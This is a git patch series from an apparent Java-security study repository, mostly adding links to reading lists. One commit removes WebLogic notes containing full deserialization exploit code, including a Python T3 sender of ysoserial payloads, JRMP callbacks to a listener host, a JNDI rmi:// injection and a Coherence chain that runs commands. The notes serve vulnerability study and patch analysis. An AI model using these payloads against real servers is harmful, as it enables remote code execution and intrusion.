Runtime.getRuntime().exec(args); +BufferedReader br = new BufferedReader(new InputStreamReader(proc.getInputStream())); +StringBuffer sb = new StringBuffer(); +String line; +while ((line = br.readLine()) != null) +{ +sb.append(line).append("\n"); +} +String result = sb.toString(); +Exception e=new Exception(result); +throw e; +} +} +``` +**目前暂时没有找到真实的demo.....** ### URLClassLoader抛出异常 From 25dfebb03a8c642c2ac81e3705d613ba6bcdf940 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 30 Apr 2022 10:49:59 +0800 Subject: [PATCH 038/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 476b835..a5be29a 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -118,3 +118,4 @@ + 2022/04/07 [(先知首发)从Jenkins RCE看Groovy代码注入](https://www.mi1k7ea.com/2020/08/26/%E4%BB%8EJenkins-RCE%E7%9C%8BGroovy%E4%BB%A3%E7%A0%81%E6%B3%A8%E5%85%A5) + 2022/04/09 [Spring Boot拦截器(Interceptor)详解](https://juejin.cn/post/6844904020675559432) **注入interceptor的基础** + 2022/04/23 [红队第4篇 | Shiro Padding Oracle无key的艰难实战利用过程](https://mp.weixin.qq.com/s?__biz=MzU4NTY4MDEzMw==&mid=2247492569&idx=1&sn=a3ff25d6fb277763785213b18885b422&chksm=fd8477b3caf3fea59b39ab27229e214e5a4038dbc6925b5ccafea9481bc8952313b404f84a11&mpshare=1&scene=23&srcid=0423xysf3wTzCs7HWGlyakZM&sharer_sharetime=1650694544259&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) ++ 2022/04/30 [【第2周】编写Poc小Tips之无损检测](https://mp.weixin.qq.com/s?__biz=Mzg3NjA4MTQ1NQ==&mid=2247483702&idx=1&sn=82567b235e7f3526e113ae1fa51cc30e&chksm=cf36f976f84170609633cb61e07787548271cd6da263043bb3e6b0333397045cef0ae259561d&mpshare=1&scene=23&srcid=04302wIyYWv0SSE4RbsbKHUi&sharer_sharetime=1651253127103&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **思路很好的** From 6fea755092057b777ce3400971a9420bce392d72 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 30 Apr 2022 15:57:28 +0800 Subject: [PATCH 039/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index a5be29a..73fc8f9 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -119,3 +119,4 @@ + 2022/04/09 [Spring Boot拦截器(Interceptor)详解](https://juejin.cn/post/6844904020675559432) **注入interceptor的基础** + 2022/04/23 [红队第4篇 | Shiro Padding Oracle无key的艰难实战利用过程](https://mp.weixin.qq.com/s?__biz=MzU4NTY4MDEzMw==&mid=2247492569&idx=1&sn=a3ff25d6fb277763785213b18885b422&chksm=fd8477b3caf3fea59b39ab27229e214e5a4038dbc6925b5ccafea9481bc8952313b404f84a11&mpshare=1&scene=23&srcid=0423xysf3wTzCs7HWGlyakZM&sharer_sharetime=1650694544259&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) + 2022/04/30 [【第2周】编写Poc小Tips之无损检测](https://mp.weixin.qq.com/s?__biz=Mzg3NjA4MTQ1NQ==&mid=2247483702&idx=1&sn=82567b235e7f3526e113ae1fa51cc30e&chksm=cf36f976f84170609633cb61e07787548271cd6da263043bb3e6b0333397045cef0ae259561d&mpshare=1&scene=23&srcid=04302wIyYWv0SSE4RbsbKHUi&sharer_sharetime=1651253127103&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **思路很好的** ++ 2022/04/20 [红蓝必备 你需要了解的weblogic攻击手法](https://mp.weixin.qq.com/s/tgQO9ILHudfkkOzeahICTg) **比较牛皮了** From b9fca45b3b61004d0985d1760181ae4267ab0a1f Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 30 Apr 2022 21:34:05 +0800 Subject: [PATCH 040/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 73fc8f9..965e6a5 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -120,3 +120,4 @@ + 2022/04/23 [红队第4篇 | Shiro Padding Oracle无key的艰难实战利用过程](https://mp.weixin.qq.com/s?__biz=MzU4NTY4MDEzMw==&mid=2247492569&idx=1&sn=a3ff25d6fb277763785213b18885b422&chksm=fd8477b3caf3fea59b39ab27229e214e5a4038dbc6925b5ccafea9481bc8952313b404f84a11&mpshare=1&scene=23&srcid=0423xysf3wTzCs7HWGlyakZM&sharer_sharetime=1650694544259&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) + 2022/04/30 [【第2周】编写Poc小Tips之无损检测](https://mp.weixin.qq.com/s?__biz=Mzg3NjA4MTQ1NQ==&mid=2247483702&idx=1&sn=82567b235e7f3526e113ae1fa51cc30e&chksm=cf36f976f84170609633cb61e07787548271cd6da263043bb3e6b0333397045cef0ae259561d&mpshare=1&scene=23&srcid=04302wIyYWv0SSE4RbsbKHUi&sharer_sharetime=1651253127103&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **思路很好的** + 2022/04/20 [红蓝必备 你需要了解的weblogic攻击手法](https://mp.weixin.qq.com/s/tgQO9ILHudfkkOzeahICTg) **比较牛皮了** ++ 2022/04/30 [Hessian2黑名单](https://github.dev/sofastack/sofa-hessian/blob/master/src/main/resources/security/serialize.blacklist) **通过已有的黑名单快速挖掘利用的危险类** From ac0fb771a3bb77da47d310af485818bdd69fd582 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 30 Apr 2022 21:42:54 +0800 Subject: [PATCH 041/332] Update README.md --- Jboss/README.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/Jboss/README.md b/Jboss/README.md index 0a7263d..029922c 100644 --- a/Jboss/README.md +++ b/Jboss/README.md @@ -4,3 +4,5 @@ JBoss 是一个基于J2EE的[开放源代码](https://baike.baidu.com/item/开 自己测试了网上很多工具发现不是特别好用 而且不集中。。。。 所以自己想写一个综合利用的工具。。。 + ++ [JBOSS CVE-2017-12149 WAF绕过之旅](https://www.yulegeyu.com/2021/03/05/JBOSS-CVE-2017-12149-WAF%E7%BB%95%E8%BF%87%E4%B9%8B%E6%97%85/) From e467afc7ba96e18978f6cbe3b0038731b8522734 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Mon, 2 May 2022 15:45:24 +0800 Subject: [PATCH 042/332] Update Readme.md --- Weblogic/Readme.md | 538 ++------------------------------------------- 1 file changed, 15 insertions(+), 523 deletions(-) diff --git a/Weblogic/Readme.md b/Weblogic/Readme.md index fa69759..b594381 100644 --- a/Weblogic/Readme.md +++ b/Weblogic/Readme.md @@ -1,539 +1,31 @@ # Weblogic ->文章内容参考:http://redteam.today/2020/03/25/weblogic%E5%8E%86%E5%8F%B2T3%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E5%8F%8A%E8%A1%A5%E4%B8%81%E6%A2%B3%E7%90%86 -> ->为了方便自己学习 +http://redteam.today/2020/03/25/weblogic%E5%8E%86%E5%8F%B2T3%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E5%8F%8A%E8%A1%A5%E4%B8%81%E6%A2%B3%E7%90%86 -![image-20210815153940829](img/image-20210815153940829.png) +https://www.yuque.com/tianxiadamutou/zcfd4v/aevpg0 +http://redteam.today/2020/03/25/weblogic%E5%8E%86%E5%8F%B2T3%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E5%8F%8A%E8%A1%A5%E4%B8%81%E6%A2%B3%E7%90%86/ +https://y4er.com/post/weblogic-jrmp/ -## CVE-2015-4852 +http://drops.xmd5.com/static/drops/web-13470.html -InboundMsgAbbrev#readobject +https://mp.weixin.qq.com/s?__biz=MzU5NDgxODU1MQ==&mid=2247485058&idx=1&sn=d22b310acf703a32d938a7087c8e8704 -InboundMsgAbbrev#resolveClass +http://blog.orange.tw/2018/03/pwn-ctf-platform-with-java-jrmp-gadget.html +## 内存木马 +https://mp.weixin.qq.com/s/eI-50-_W89eN8tsKi-5j4g +https://www.shuzhiduo.com/A/gVdnM4685W/ -从入口点开始`weblogic.rjvm.InboundMsgAbbrev#readObject`方法开始。通过`read()`方法,读取T3数据流的序列化部分依次分块解析类。`InboundMsgAbbrev#resolveClass()`内部使用`Class.forName`来从类序列化获取到对应类的一个Class的对象。进行相对应的点实例化并读取了`AnnotationInvocationHandler`触发了此处CC1的利用链。最后在`AbstractMapDecorator#entrySet()`方法触发,达到了rce目的。 +https://xz.aliyun.com/t/10323#toc-49 -https://www.cnblogs.com/0x7e/p/14529949.html +https://github.com/Y4er/WebLogic-Shiro-shell +https://kuron3k0.github.io/2021/04/23/weblogic-memshell-1/ +https://kuron3k0.github.io/2021/04/29/weblogic-memshell-2/ -主要有以下几个部分组成: +https://www.cnblogs.com/bitterz/p/14970230.html -【数据包长度】【T3协议头】【反序列化标志】【数据】 - -00 00 0d cf 是数据包长度 - -通常在反序列化数据包中,`ac ed 00 05` 是反序列化标志,在 T3 协议中由于每个反序列化数据包前面都有 `fe 01 00 00` ,所以这里的标志相当于就是 `fe 01 00 00 ac ed 00 05` - -![image-20210815001234456](img/image-20210815001234456.png) - -```python -import socket -import sys -import struct -import re -import subprocess -import binascii - -def get_payload1(gadget, command): - JAR_FILE = '/Users/cengsiqi/Desktop/javasectools/ysoserial/target/ysoserial-0.0.6-SNAPSHOT-all.jar' - popen = subprocess.Popen(['java', '-jar', JAR_FILE, gadget, command], stdout=subprocess.PIPE) - return popen.stdout.read() - -def get_payload2(path): - with open(path, "rb") as f: - return f.read() - -def exp(host, port, payload): - sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - sock.connect((host, port)) - - handshake = "t3 12.2.3\nAS:255\nHL:19\nMS:10000000\n\n".encode() - sock.sendall(handshake) - data = sock.recv(1024) - pattern = re.compile(r"HELO:(.*).false") - version = re.findall(pattern, data.decode()) - if len(version) == 0: - print("Not Weblogic") - return - - print("Weblogic {}".format(version[0])) - data_len = binascii.a2b_hex(b"00000000") #数据包长度,先占位,后面会根据实际情况重新 - t3header = binascii.a2b_hex(b"016501ffffffffffffffff000000690000ea60000000184e1cac5d00dbae7b5fb5f04d7a1678d3b7d14d11bf136d67027973720078720178720278700000000a000000030000000000000006007070707070700000000a000000030000000000000006007006") #t3协议头 - flag = binascii.a2b_hex(b"fe010000") #反序列化数据标志 - payload = data_len + t3header + flag + payload - payload = struct.pack('>I', len(payload)) + payload[4:] #重新计算数据包长度 - sock.send(payload) - -if __name__ == "__main__": - host = "127.0.0.1" - port = 7001 - gadget = "CommonsCollections1" #CommonsCollections1 Jdk7u21 - command = "touch /tmp/CVE-2015-4852" - - payload = get_payload1(gadget, command) - exp(host, port, payload) -``` - -### 修复 - -补丁:2016年1月 p21984589_1036_Generic -修复方法是在resolveClass中引入了 ClassFilter.isBlackListed进行过滤,跟进weblogic.rmi.ClassFilter可以看到黑名单内容。 - -## CVE-2016-0638 - -weblogic.jms.common.StreamMessageImpl没在黑名单,在其反序列化时会读取一段数据并进行反序列化,我们可以把这段数据伪造成rce payload。 - -![image-20210815103726507](img/image-20210815103726507.png) - -乱入一个QA -Q:StreamMessageImpl可以过黑名单很好理解,但是为啥CommonsCollections1依旧可以成功,CommonsCollections1(org.apache.commons.collections.functors)不是在黑名单里面吗? - -A:答案是ServerChannelInputStream没有过滤到org.apache.commons.collections.functors(废话)。细节是这样的:ServerChannelInputStream的resolveClass检验到是StreamMessageImpl,不在黑名单里面,通过。然后在反序列化流程中会调用StreamMessageImpl的readExternal,readExternal内部又new了新的ObjectInputStream(以后简称ois)并从缓冲区读反序列化数据再次调用readObject,这里原生的ois就是原生的resolveClass方法没有过滤。 - -**有点类似二次反序列化利用。。** - -```java -import weblogic.jms.common.StreamMessageImpl; - -import java.io.*; - -public class CVE_2016_0638 { - - public static void main(String[] args) throws IOException { - byte[] payload = exec("CommonsCollections1", "touch /tmp/CVE_2016_0638"); - StreamMessageImpl streamMessage = new StreamMessageImpl(payload); - ser(streamMessage, "CVE_2016_0638.ser"); - } - - public static byte[] exec(String gadget, String command) throws IOException { - String[] cmd = {"java", "-jar", "/Users/cengsiqi/Desktop/javasectools/ysoserial/target/ysoserial-0.0.6-SNAPSHOT-all.jar", gadget, command}; - InputStream in = Runtime.getRuntime().exec(cmd).getInputStream(); - - ByteArrayOutputStream baos = new ByteArrayOutputStream(); - byte[] b = new byte[4096]; - int a = -1; - - while ((a = in.read(b)) != -1) { - baos.write(b, 0, a); - } - - return baos.toByteArray(); - } - - public static void ser(Object obj, String serName) throws IOException { - File file = new File(serName); - ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream(file)); - oos.writeObject(obj); - System.out.println("-------序列化成功" + serName); - } -} -``` - -### 修复 - -补丁:2016年4月p22505423_1036_Generic -把原生的ois换成了FilteringObjectInputStream - -## CVE-2016-3510 - -weblogic.corba.utils.MarshalledObject不在黑名单中,并且在readResolve的时候会读取objBytes的值赋给新new的ois。那么我们在objBytes中放入rce payload即可。 - -![image-20210815103750342](img/image-20210815103750342.png) - -```java -import weblogic.corba.utils.MarshalledObject; -import weblogic.jms.common.StreamMessageImpl; - -import java.io.*; -import java.lang.reflect.Field; - -public class CVE_2016_3510 { - public static void main(String[] args) throws IOException, ClassNotFoundException, NoSuchFieldException, IllegalAccessException { - byte[] payload = exec("CommonsCollections1", "touch /tmp/CVE_2016_3510"); - MarshalledObject marshalledObject = new MarshalledObject("foo"); - Class cls = marshalledObject.getClass(); - Field field = cls.getDeclaredField("objBytes"); - field.setAccessible(true); - field.set(marshalledObject, payload); - ser(marshalledObject,"./CVE_2016_3510.ser"); - } - - public static byte[] exec(String gadget, String command) throws IOException { - String[] cmd = {"java", "-jar", "/Users/cengsiqi/Desktop/javasectools/ysoserial/target/ysoserial-0.0.6-SNAPSHOT-all.jar", gadget, command}; - InputStream in = Runtime.getRuntime().exec(cmd).getInputStream(); - - ByteArrayOutputStream baos = new ByteArrayOutputStream(); - byte[] b = new byte[4096]; - int a = -1; - - while ((a = in.read(b)) != -1) { - baos.write(b, 0, a); - } - - return baos.toByteArray(); - } - - public static void ser(Object obj, String serName) throws IOException { - File file = new File(serName); - ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream(file)); - oos.writeObject(obj); - System.out.println("-------序列化成功" + serName); - } -} -``` - -### 修复 - -补丁:2016年10月 p23743997_1036_Generic -重写了resolveClass方法,加了过滤。 - -## CVE-2017-3248 - -![image-20210815110026954](img/image-20210815110029190.png) - -通过jrmpclient去触发反序列化,然后在去连接我们的jrmplistener在触发反序列化漏洞。 - -```python -import socket -import sys -import struct -import re -import subprocess -import binascii - -def get_payload1(gadget, command): - JAR_FILE = '/Users/cengsiqi/Desktop/javasectools/ysoserial/target/ysoserial-0.0.6-SNAPSHOT-all.jar' - popen = subprocess.Popen(['java', '-jar', JAR_FILE, gadget, command], stdout=subprocess.PIPE) - return popen.stdout.read() - -def get_payload2(path): - with open(path, "rb") as f: - return f.read() - -def exp(host, port, payload): - sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - sock.connect((host, port)) - - handshake = "t3 12.2.3\nAS:255\nHL:19\nMS:10000000\n\n".encode() - sock.sendall(handshake) - data = sock.recv(1024) - pattern = re.compile(r"HELO:(.*).false") - version = re.findall(pattern, data.decode()) - if len(version) == 0: - print("Not Weblogic") - return - - print("Weblogic {}".format(version[0])) - data_len = binascii.a2b_hex(b"00000000") #数据包长度,先占位,后面会根据实际情况重新 - t3header = binascii.a2b_hex(b"016501ffffffffffffffff000000690000ea60000000184e1cac5d00dbae7b5fb5f04d7a1678d3b7d14d11bf136d67027973720078720178720278700000000a000000030000000000000006007070707070700000000a000000030000000000000006007006") #t3协议头 - flag = binascii.a2b_hex(b"fe010000") #反序列化数据标志 - payload = data_len + t3header + flag + payload - payload = struct.pack('>I', len(payload)) + payload[4:] #重新计算数据包长度 - sock.send(payload) - -if __name__ == "__main__": - host = "127.0.0.1" - port = 7001 - gadget = "JRMPClient" #CommonsCollections1 Jdk7u21 JRMPClient - command = "192.168.1.3:8080" # - - payload = get_payload1(gadget, command) - exp(host, port, payload) -``` - -### 修复 - -补丁:p24667634_1036_Generic -官方的修复是新加resolveProxyClass,过滤java.rmi.registry.Registry - -## CVE-2018-2628 - -上面提到过滤了Registry,这样ysoserial中原生JRMPClient就打不了,但是仍然有多种办法bypass。 - ->这个CVE廖也提交了绕过,他的绕过是用java.rmi.activation.Activator替换java.rmi.registry.Registry,从而绕过resolveProxyClass的判断。其实这里对接口没有要求,不一定是rmi接口,随便找一个接口都行,比如java.util.Map - -直接用UnicastRef。CVE-2017-3248的构造中把UnicastRef放入了Registry,其实用UnicastRef也能在反序列化的时候发起jrmp请求。这种方法要比替换接口的干脆很多。在ysoserial中加一个JRMPClient2 - -```java -package ysoserial.payloads; - -import java.rmi.server.ObjID; -import java.util.Random; -import sun.rmi.server.UnicastRef; -import sun.rmi.transport.LiveRef; -import sun.rmi.transport.tcp.TCPEndpoint; -import ysoserial.payloads.annotation.Authors; -import ysoserial.payloads.annotation.PayloadTest; -import ysoserial.payloads.util.PayloadRunner; - - -@SuppressWarnings ( { - "restriction" -} ) -@PayloadTest( harness="ysoserial.test.payloads.JRMPReverseConnectSMTest") -@Authors({ Authors.MBECHLER }) -public class JRMPClient2 extends PayloadRunner implements ObjectPayload { - - public UnicastRef getObject ( final String command ) throws Exception { - - String host; - int port; - int sep = command.indexOf(':'); - if ( sep < 0 ) { - port = new Random().nextInt(65535); - host = command; - } - else { - host = command.substring(0, sep); - port = Integer.valueOf(command.substring(sep + 1)); - } - ObjID id = new ObjID(new Random().nextInt()); // RMI registry - TCPEndpoint te = new TCPEndpoint(host, port); - UnicastRef ref = new UnicastRef(new LiveRef(id, te, false)); - return ref; - } - - - public static void main ( final String[] args ) throws Exception { - Thread.currentThread().setContextClassLoader(JRMPClient.class.getClassLoader()); - PayloadRunner.run(JRMPClient.class, args); - } -} -``` - -### 修复 - -补丁:2018年四月发布的p27395085_1036_Generic -UnicastRef在weblogic.utils.io.oif.WebLogicFilterConfig中加进了黑名单。 - -## CVE-2018-2893 - -streamMessageImpl + jrmp代理类绕过。先来看payload - -```java -import sun.rmi.server.UnicastRef; -import sun.rmi.transport.LiveRef; -import sun.rmi.transport.tcp.TCPEndpoint; -import weblogic.jms.common.StreamMessageImpl; - -import java.io.*; -import java.lang.reflect.Proxy; -import java.rmi.registry.Registry; -import java.rmi.server.ObjID; -import java.rmi.server.RemoteObjectInvocationHandler; -import java.util.Random; - -public class CVE_2018_2893 { - public static void main(String[] args) throws IOException { - ObjID objID = new ObjID(new Random().nextInt()); // RMI registry - TCPEndpoint tcpEndpoint = new TCPEndpoint("192.168.1.3", 8080); - UnicastRef unicastRef = new UnicastRef(new LiveRef(objID, tcpEndpoint, false)); - RemoteObjectInvocationHandler remoteObjectInvocationHandler = new RemoteObjectInvocationHandler(unicastRef);//通过代理 - Object object = Proxy.newProxyInstance(Thread.currentThread().getContextClassLoader(), new Class[] { Registry.class }, remoteObjectInvocationHandler); - StreamMessageImpl streamMessage = new StreamMessageImpl(serialize(object)); - ser(streamMessage, "CVE_2018_2893.ser"); - } - - public static void ser(Object obj, String serName) throws IOException { - File file = new File(serName); - ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream(file)); - oos.writeObject(obj); - System.out.println("-------序列化成功" + serName); - } - - public static byte[] serialize(final Object obj) throws IOException { - final ByteArrayOutputStream out = new ByteArrayOutputStream(); - serialize(obj, out); - return out.toByteArray(); - } - - public static void serialize(final Object obj, final OutputStream out) throws IOException { - final ObjectOutputStream objOut = new ObjectOutputStream(out); - objOut.writeObject(obj); - } -} -``` - -### 修复 - -补丁:18年7月 p27919965_1036_Generic -这次修复把经过resolveClass的java.rmi.server.RemoteObjectInvocationHandler给过滤了。 - -## CVE-2018-3245 - ->根据前面的分析可知,我们只需要找一个类似java.rmi.server.RemoteObjectInvocationHandler的类进行替换,就能继续绕过了。 ->那么这个类应该满足以下条件: ->继承远程类:java.rmi.server.RemoteObject ->不在黑名单里边(java.rmi.activation. 、sun.rmi.server.) ->随便找了一下,符合条件的挺多的: ->javax.management.remote.rmi.RMIConnectionImpl_Stub ->com.sun.jndi.rmi.registry.ReferenceWrapper_Stub ->javax.management.remote.rmi.RMIServerImpl_Stub ->sun.rmi.registry.RegistryImpl_Stub ->sun.rmi.transport.DGCImpl_Stub - -```java -import com.sun.jndi.rmi.registry.ReferenceWrapper_Stub; -import sun.rmi.server.UnicastRef; -import sun.rmi.transport.LiveRef; -import sun.rmi.transport.tcp.TCPEndpoint; -import java.io.*; -import java.rmi.server.ObjID; -import java.util.Random; - -public class CVE_2018_3245 { - public static void main(String[] args) throws IOException { - ObjID id = new ObjID(new Random().nextInt()); // RMI registry - TCPEndpoint te = new TCPEndpoint("192.168.1.3", 8080); - UnicastRef ref = new UnicastRef(new LiveRef(id, te, false)); - ReferenceWrapper_Stub wrapperStub = new ReferenceWrapper_Stub(ref); - ser(wrapperStub, "CVE_2018_3245.ser"); - - } - - public static void ser(Object obj, String serName) throws IOException { - File file = new File(serName); - ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream(file)); - oos.writeObject(obj); - System.out.println("-------序列化成功" + serName); - } - -} -``` - -### 修复 - -补丁:2018年8月 p28343311_1036_201808Generic -修复方法是添加更底层的java.rmi.server.RemoteObject。 - -## CVE-2018-3191 - -这个洞是jndi注入。触发点在JtaTransactionManager。 - -```java -import com.bea.core.repackaged.springframework.transaction.jta.JtaTransactionManager; - -import java.io.File; -import java.io.FileOutputStream; -import java.io.IOException; -import java.io.ObjectOutputStream; - -public class CVE_2018_3191 { - public static void main(String[] args) throws IOException { - String jndiAddress = "rmi://192.168.1.3:1099/Exploit"; - JtaTransactionManager jtaTransactionManager = new JtaTransactionManager(); - jtaTransactionManager.setUserTransactionName(jndiAddress); - ser(jtaTransactionManager, "CVE_2018_3191.ser"); - } - - public static void ser(Object obj, String serName) throws IOException { - File file = new File(serName); - ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream(file)); - oos.writeObject(obj); - System.out.println("-------序列化成功" + serName); - } -} -``` - -### 修复 - -补丁:2018年8月 p28343311_1036_Generic - - - - - -## CVE-2020-2555 - -Oracle Coherence组件存在漏洞,该组件默认集成在Weblogic12c及以上版本中(网上资料这么说的:web10.3.6也有只是默认没有启用,未验证)。 -这个漏洞和cc5的构造有异曲同工之妙,触发点在BadAttributeValueExpException#readObject 中调用toString方法。 - -**Coherence组件** - -```java -import com.tangosol.util.ValueExtractor; -import com.tangosol.util.extractor.ChainedExtractor; -import com.tangosol.util.extractor.ReflectionExtractor; -import com.tangosol.util.filter.LimitFilter; - -import javax.management.BadAttributeValueExpException; -import java.io.*; -import java.lang.reflect.Field; - -public class CVE_2020_2555 { - public static void main(String[] args) throws NoSuchFieldException, IllegalAccessException, IOException, ClassNotFoundException { - //String cmd = "touch /tmp/CVE_2020_2555_12013"; - String cmd ="calc.exe"; - ValueExtractor[] valueExtractors = new ValueExtractor[]{ - new ReflectionExtractor("getMethod", new Object[]{"getRuntime", new Class[0]}), - new ReflectionExtractor("invoke", new Object[]{null, new Object[0]}), - //new ReflectionExtractor("exec", new Object[]{new String[]{"/bin/bash", "-c", cmd}}) - new ReflectionExtractor("exec", new Object[]{new String[]{"cmd.exe", "/c", cmd}}) - }; - // chain - LimitFilter limitFilter = new LimitFilter(); - limitFilter.setTopAnchor(Runtime.class); - BadAttributeValueExpException expException = new BadAttributeValueExpException(null); - Field m_comparator = limitFilter.getClass().getDeclaredField("m_comparator"); - m_comparator.setAccessible(true); - m_comparator.set(limitFilter, new ChainedExtractor(valueExtractors)); - Field m_oAnchorTop = limitFilter.getClass().getDeclaredField("m_oAnchorTop"); - m_oAnchorTop.setAccessible(true); - m_oAnchorTop.set(limitFilter, Runtime.class); - Field val = expException.getClass().getDeclaredField("val"); - val.setAccessible(true); - val.set(expException, limitFilter); - ser(expException, "./CVE_2020_2555_12013.ser"); - } - - public static void ser(Object obj, String serName) throws IOException { - File file = new File(serName); - ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream(file)); - oos.writeObject(obj); - System.out.println("-------序列化成功" + serName); - } - -} -``` - -### 修复 - -删了extractor.extract - -## 总结 - -参考大师傅文章梳理完一遍之后,我们得以看到整个绕过思路的全貌。笔者主观分为三个阶段。 - -- 第一阶段,CVE-2016-0638和CVE-2016-3510。利用反序列化流程中新new的原生ois绕过,只要找到了read*系列的点可以比较容易的看出来。 -- 第二阶段,cve-2017-3248到cve-2018-3191。利用jrmp、jndi带外rce,漏洞点没有在read*的代码上下文中需要多跟几步有点“pop”的感觉了。 -- 第三阶段,cve-2020-2555,需要对java的反序列化出现过知识点很熟悉(java原生类的触发点+weblogic组件中类似cc的套路),据说这个漏洞的作者也挖了很久。 - - - - - - - - - - - ->参考: -> ->https://www.yuque.com/tianxiadamutou/zcfd4v/aevpg0 -> ->http://redteam.today/2020/03/25/weblogic%E5%8E%86%E5%8F%B2T3%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E5%8F%8A%E8%A1%A5%E4%B8%81%E6%A2%B3%E7%90%86/ -> ->https://y4er.com/post/weblogic-jrmp/ -> ->http://drops.xmd5.com/static/drops/web-13470.html -> ->https://mp.weixin.qq.com/s?__biz=MzU5NDgxODU1MQ==&mid=2247485058&idx=1&sn=d22b310acf703a32d938a7087c8e8704 -> ->http://blog.orange.tw/2018/03/pwn-ctf-platform-with-java-jrmp-gadget.html From 6e45fb7201296ab6719a5bc27d6b3171ea2afe50 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Mon, 2 May 2022 20:28:00 +0800 Subject: [PATCH 043/332] Update Readme.md --- "java\345\233\236\346\230\276/Readme.md" | 6 ++++++ 1 file changed, 6 insertions(+) diff --git "a/java\345\233\236\346\230\276/Readme.md" "b/java\345\233\236\346\230\276/Readme.md" index 27e1a87..6b74f01 100644 --- "a/java\345\233\236\346\230\276/Readme.md" +++ "b/java\345\233\236\346\230\276/Readme.md" @@ -1,5 +1,11 @@ # java回显 +**2022/5/2更新,发现fnmsd师傅弄跟dsf的回显感觉很np** +``` +https://blog.csdn.net/fnmsd/article/details/106709736 +https://blog.csdn.net/fnmsd/article/details/106890242 +``` + 发现个好项目 https://github.com/feihong-cs/Java-Rce-Echo >一般web服务是想办法获得response对象,可以参考[2021RCTF ezshell](https://github.com/Firebasky/ctf-Challenge/tree/main/RCTF-2021-EZshell) From 1e1da329ae1a35dc4fc1dc081df5d1527a1ed404 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Mon, 2 May 2022 20:34:52 +0800 Subject: [PATCH 044/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 965e6a5..7e6da48 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -121,3 +121,4 @@ + 2022/04/30 [【第2周】编写Poc小Tips之无损检测](https://mp.weixin.qq.com/s?__biz=Mzg3NjA4MTQ1NQ==&mid=2247483702&idx=1&sn=82567b235e7f3526e113ae1fa51cc30e&chksm=cf36f976f84170609633cb61e07787548271cd6da263043bb3e6b0333397045cef0ae259561d&mpshare=1&scene=23&srcid=04302wIyYWv0SSE4RbsbKHUi&sharer_sharetime=1651253127103&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **思路很好的** + 2022/04/20 [红蓝必备 你需要了解的weblogic攻击手法](https://mp.weixin.qq.com/s/tgQO9ILHudfkkOzeahICTg) **比较牛皮了** + 2022/04/30 [Hessian2黑名单](https://github.dev/sofastack/sofa-hessian/blob/master/src/main/resources/security/serialize.blacklist) **通过已有的黑名单快速挖掘利用的危险类** ++ 2022/05/02 [不同的类加载器加载的类不是同一个类](https://blog.csdn.net/csdnlijingran/article/details/89226943) From 26eddc19b5d8ee46fe9d03e3204672f6a9a88ddd Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Mon, 2 May 2022 20:37:34 +0800 Subject: [PATCH 045/332] Update README.md --- README.md | 16 ++++------------ 1 file changed, 4 insertions(+), 12 deletions(-) diff --git a/README.md b/README.md index c8f82b9..7a7d092 100644 --- a/README.md +++ b/README.md @@ -28,20 +28,12 @@ ## 代学习 [java设计模式](https://www.runoob.com/design-pattern/design-pattern-tutorial.html) :heavy_check_mark: -[jvm学习]() +[jvm学习]() 正在学习中. +## 说明 +目前该项目更新可能会慢一些,更新的基本上是在[添加了Java日常知识点](java日常)中记录自己感觉有意思的文章和小trick,希望对你有帮助. - -## 小记录 -2021/12/21更新 - -项目100star啦~~~~~~~~ - 